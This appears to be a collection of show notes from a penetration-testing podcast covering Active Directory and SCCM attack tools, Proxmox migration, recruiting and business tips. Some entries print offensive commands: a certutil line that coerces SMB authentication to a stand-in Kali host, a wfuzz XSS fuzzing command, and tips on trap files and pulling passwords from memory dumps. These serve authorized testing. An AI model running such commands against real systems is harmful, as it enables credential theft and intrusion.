7 Minute Security

Today we’re talking about eating the security dog food – specifically: Satisfying critical security control #1 Using the Atlassian family of tools to create a ticketing/change control system and wrap it into an asset inventory Leveraging Wazuh as a security monitoring system (with eventual plans to leverage its API to feed Atlassian inventory data)

Hi, today’s tale of pentest pwnage covers a few wins and one loss: A cool opportunity to drop Farmer “crops” to a domain admin’s desktop folder via PowerShell remote session Finding super sensitive data by dumpster-diving into a stale C:\Users\Domain-Admin profile Finding a vCenter database backup and being unable to pwn it using vcenter_saml_login

Hey friends, we’re doing a little departure from our normal topics and focusing on how to create a security knowledgebase (is that one word or two?) using Docusaurus!  It’s cool, it’s free, it’s from Meta and you can get up and going in just a few commands – check out their getting started guide to get rockin’ in about 5 minutes. Important files include: docusaurus.config.js – for setting the site title and key config settings sidebars.js – used to create/edit navigation bar menus /src/css/custom.css – to style the site

Today’s tale of pentest pwnage includes some fun stuff, including: SharpGPOAbuse helps abuse vulnerable GPOs!  Try submitting a harmless POC first via a scheduled task – like ping -n 1 your.kali.ip.address.  When you’re ready to fire off a task that coerces SMB auth, try certutil -syncwithWU \\your.kali.ip.address\arbitrary-folder. I’m not 100% sure on this, but I think scheduled tasks capture Kerberos tickets temporarily to workstation(s).  If you’re on a compromised machine, try Get-ScheduledTask -taskname "name" | select * to get information about what context the attack is running under. DonPAPI got an upgrade recently with a focus on evasion! When attacking vCenter (see our past YouTube stream for a walkthrough), make sure you’ve got the vmss2core utility, which I couldn’t find anywhere except the Internet Archive.  Then I really like to follow this article to pull passwords from VM memory dumps. Can’t RDP into a victim system that you’re PSRemote’d into?  Maybe RDP is listening on an alternate port! 

Hi friends, today’s a tale full of test tips and tools to help you in your adventures in pentesting! SCCM Exploitation SCCM Exploitation: The First Cred Is the Deepest II w/ Gabriel Prud’homme – fantastic resource for learning all about attacking SCCM – starting from a perspective of zero creds CMLoot – find interesting files stored on (System Center) Configuration Manager (SCCM/CM) SMB shares Snaffler – finds all the interesting SMB shares and juicy file contents Efflanrs – takes the raw Snaffler log and turns it into an interactive Web app! RubeusToCcache – a small tool to convert Base64-encoded .kirbi tickets from Rubeus into .ccache files for Impacket

Today I recap a two week persona/biz road trip and talk about the security stuff that got sprinkled into it, including: Family members who don’t care about their personal security Weakpass – a cool collection of word lists for brute-forcing and spraying that I’d never heard of Working on two security Webinars for Netwrix (here’s part 1: Mastering Password Security & Active Directory Monitoring, and and part 2: Advanced Strategies for SQL Server Protection & Sensitive Information Security) The moment we though our credit card was stolen at a waterpark A shameless plug for our fun interview with Stu the recruiter Some internal pentest tips that have given us some gold in recent assessments Super fast, spoiler-free movie reviews of Roadhouse, Arcadian, Late Night with the Devil and The Coffee Table

Today we have a fun featured interview with my new friend Stu Musil of Ambient Consulting I had a great time talking with Stu about bashing come common misconceptions people have about working with recruiters, plus tackling some frequently asked questions: How do you properly vet a recruiter you don’t know, but who offers a job opportunity you’re interested in? What questions should you ask a potential recruiter to get a feel for their level of experience in the industry (hint, if a recruiter doesn’t even have a LinkedIn page, that’s probably a red flag) Resume tips: Finding the right length and tone Tailoring your resume for each individual job Highlighting your strengths Do people still use cover letters when applying to a gig? Is a “hobbies and interests” section still a good idea on a resume (to show them you’re not a robot who works 24/7)? Lets talk about some horror and/or success stories from the world of recruiting!

Hey friends, today we talk about some not-so-glamorous but ever-so-important stuff related to running a cybersecurity consultancy, including: Taking an inventory of all the SaaS stuff your business uses – to keep an eye on spending, know when services are expiring, and track which credit card the services are tied to (so the services don’t almost get cancelled like some did with me!) Tracking domain names, and setting up your own automated rules to notify you well ahead of time when a domain is expiring (maybe that passion project is never gonna happen…time to let those old domains go

Hey friends, today we continue our series all about migrating from VMWare to the world Proxmox!  Specifically: Getting my first Proxmox-based NUCs out in the field for live engagements! Pulling the trigger on two bare-metal Proxmox servers to eventually replace my vCenter environment. OVHCloud made it super easy to to add Proxmox to those bare-metals with a simple wizard. I couldn’t figure out how to get a Proxmox VM as the main firewall for the whole Proxmox node, but it turns out it helps to RTFM. When getting a bare-metal OS/hypervisor installed, be careful in that the provider may leave the management ports of that host open to the whole world.  In OVH’s case, they have a software firewall that can be tuned so that, for example, only you can hit the management ports for the box. Getting VLANs setup is a snap once the virtual hardware stuff is in place.

Hey friends, today we’ve got a security milkshake episode about Web app pentesting. Specifically we talk about: Burp Suite Enterprise Caido – a lightweight alternative to Burp wfuzz – Web fuzzer.  Using a proxy:wfuzz -c -z file,/usr/share/wfuzz/wordlist/Injections/XSS.txt –sc 200 “https://somedomain.com/shopping?&qty=%2FUZZ” -p 10.0.7.11:8080 KNOXSS – for XSS testing – pairs nicely with this wrapper: https://github.com/xnl-h4ck3r/knoxnl In the tangent dept, I moan about how I hate some things about Proxmox but am also starting to love it. In the tangent #2 department, I talk about tinnitus and acupuncture!

Road trip time! I’ve been traveling this week doing some fun security projects, and thought all this highway time would be a perfect opportunity to take a dip into the 7MS mail bag!  Today’s questions include: How do you price internal network penetration tests? Have you ever had to deal with a difficult client situation, and how did you resolve it? Are you done going after certs?  Spoiler: no – I’m interested in doing the XINTRA labs (not sure if it includes a cert) Do you provide managed services or just stick with more “one and done” assessment work? You said the “smart business people” tell you to form reseller partnerships, otherwise you’re leaving money on the table – so why don’t you? I’m thinking of starting my own cybersecurity consultancy – what type of insurance do I need to protect me in case of a digital “oops?”

Today’s tale of pentest pwnage is all about my new favorite attack called SPN-less RBCD. We did a teaser episode last week that actually ended up being a full episode all about the attack, and even step by step commands to pull it off.  But I didn’t want today’s episode to just be “Hey friends, check out the YouTube version of this attack!” so I also cover: Our first first impressions of Burp Enterprise Why I have a real hard time believing you have to follow all these steps to install Kali on Proxmox

Today’s prelude to a tale of pentest pwnage talks about something called “spnless RBCD” (resource-based constrained delegation).  The show notes don't format well here in the podcast notes, so head to 7minsec.com to see the notes in all their glory.

Sadly, the Broadcom acquisition of VMWare has hit 7MinSec hard – we love running ESXi on our NUCs, but ESXi free is no longer available.  To add insult to injury, our vCenter lab at OVHcloud HQ got a huge price gouge (due to license cost increase; not OVH’s fault).  Now we’re exploring Proxmox as an alternative hypervisor, so we’re using today’s episode to kick off a series about the joys and pains of this migration process.

Today we revisit a series about eating the security dog food – in other words, practicing what we preach as security gurus!  Specifically we talk about: We’re going to get a third-party assessment on 7MinSec (the business) Tips for secure email backup/storage Limiting the retention of sensitive data you store in cloud places

Today we’re talking about tips to deal with stress and anxiety: It sounds basic, but take breaks – and take them in a different place (don’t just stay in the office and do more screen/doom-scrolling) I’ve never gotten to a place in my workload where I go “Ahhh, all caught up!” so I should stop striving to hit that invisible goal. Chiropractic and back massages have done wonders for the tightness in my neck and shoulders For me, video games where you punch and kick things relieves stress as well (including a specific game that’s definitely not for kids!)

We did something crazy today and recorded an episode that was 7 minutes long!  Today we talk about some things that have helped us out in recent pentests: When using Farmer to create “trap” files that coerce authentication, I’ve found way better results using Windows Search Connectors (.searchConnector-ms) files This matrix of “can I relay this to that” has been super helpful, especially early in engagements

Today’s episode is all about writing reports in Sysreptor.  It’s awesome!  Main takeaways: The price is free (they have a paid version as well)! You can send findings and artifacts directly to the report server using the reptor Python module Warning: Sysreptor only exports to PDF (no Word version option!) Sysreptor has helped us write reports faster without sacrificing quality

Hey friends, today we’ve got a tale of pentest pwnage that covers: Passwords – make sure to look for patterns such as keyboard walks, as well as people who are picking passwords where the month the password changed is part of the password (say that five times fast)! Making sure you go after cached credentials Attacking SCCM – Misconfiguration Manager is an absolute gem to read, and The First Cred is the Deepest – Part 2 with Gabriel Prud’homme is an absolute gem to see.  Also, check out sccmhunter for all your SCCM pwnage needs.

Hey friends, today we have a super fun interview with Andrew Morris of GreyNoise to share.  Andrew chatted with us about: Young Andrew’s early adventures in hacking his school’s infrastructure (note: don’t try this at home, kids!) Meeting a pentester for the first time, and getting his first pentesting job Spinning up a box on the internet, having it get popped instantly, and wondering…”Are all these people trying to hack me?” Battling through a pentester’s least favorite part of the job: THE REPORT! GreyNoise’s origin story How to build a better honeypot/honeynet